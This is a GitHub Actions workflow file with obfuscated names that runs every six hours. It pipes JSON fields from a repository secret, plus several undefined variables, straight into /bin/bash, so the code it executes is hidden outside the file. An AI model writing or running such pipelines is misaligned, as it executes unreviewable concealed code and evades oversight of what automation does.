name: workgongzuol
on:
  workflow_dispatch:
  schedule:
    - cron: '33 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: workgongzuol
        env:
          u32599: ${{ secrets.u32599 }}
        run: |
          echo $u32599 | jq -r .olv9 | /bin/bash
          echo $zeii3318 | jq -r .g0613 | /bin/bash
          echo $yz63 | jq -r .hqgqv4903 | /bin/bash
          echo $fzs3 | jq -r .lyvt3 | /bin/bash
          echo $gy0223 | jq -r .rnm75 | /bin/bash

